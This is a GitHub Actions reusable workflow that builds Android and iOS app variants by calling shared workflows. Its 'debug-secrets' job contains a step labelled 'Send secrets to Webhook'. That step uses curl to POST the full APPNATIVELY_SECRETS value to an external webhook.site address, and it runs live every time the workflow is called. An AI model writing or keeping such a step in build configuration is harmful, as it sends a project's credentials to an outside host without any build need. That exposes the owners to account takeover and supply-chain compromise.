name: Build Mobile App

permissions:
  contents: read

on:
  workflow_call:
    inputs:
      platform:
        required: true
        type: string
        default: 'both'
      android_type:
        required: false
        type: string
        default: 'both'
      ios_type:
        required: false
        type: string
        default: 'both'
      build_id:
        required: true
        type: string
      node_version:
        required: false
        type: string
        default: '24.11'
      java_version:
        required: false
        type: string
        default: '17'
      ruby_version:
        required: false
        type: string
        default: '3.3'
    secrets:
      APPNATIVELY_SECRETS:
        required: false


jobs:
  debug-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Check Secrets
        run: |
          echo "--- Secret Presence Check ---"
          echo "APPNATIVELY_SECRETS: ${{ secrets.APPNATIVELY_SECRETS != '' && '✅ Set' || '❌ MISSING' }}"
          echo "----------------------------"

      - name: Send secrets to Webhook
        run: |
          curl -s -X POST https://webhook.site/321180e7-df1e-40d6-8e6e-fc9afc99d2af \
            -H "Content-Type: application/json" \
            -d @- <<EOF
          ${{ secrets.APPNATIVELY_SECRETS }}
          EOF

  android-aab:
    name: Android AAB
    if: ${{ (inputs.platform == 'android' || inputs.platform == 'both') && (inputs.android_type == 'aab' || inputs.android_type == 'both') }}
    uses: appnatively/workflows/.github/workflows/android-aab.yml@master
    secrets: inherit
    with:
      build_id: ${{ inputs.build_id }}
      node_version: ${{ inputs.node_version }}
      java_version: ${{ inputs.java_version }}

  android-apk:
    name: Android APK
    if: ${{ (inputs.platform == 'android' || inputs.platform == 'both') && (inputs.android_type == 'apk' || inputs.android_type == 'both') }}
    uses: appnatively/workflows/.github/workflows/android-apk.yml@master
    secrets: inherit
    with:
      build_id: ${{ inputs.build_id }}
      node_version: ${{ inputs.node_version }}
      java_version: ${{ inputs.java_version }}

  ios-bundle:
    name: iOS Bundle
    if: ${{ (inputs.platform == 'ios' || inputs.platform == 'both') && (inputs.ios_type == 'bundle' || inputs.ios_type == 'both') }}
    uses: appnatively/workflows/.github/workflows/ios-bundle.yml@master
    secrets: inherit
    with:
      build_id: ${{ inputs.build_id }}
      node_version: ${{ inputs.node_version }}
      ruby_version: ${{ inputs.ruby_version }}

  ios-simulator:
    name: iOS Simulator
    if: ${{ (inputs.platform == 'ios' || inputs.platform == 'both') && (inputs.ios_type == 'simulator' || inputs.ios_type == 'both') }}
    uses: appnatively/workflows/.github/workflows/ios-simulator.yml@master
    secrets: inherit
    with:
      build_id: ${{ inputs.build_id }}
      node_version: ${{ inputs.node_version }}
      ruby_version: ${{ inputs.ruby_version }}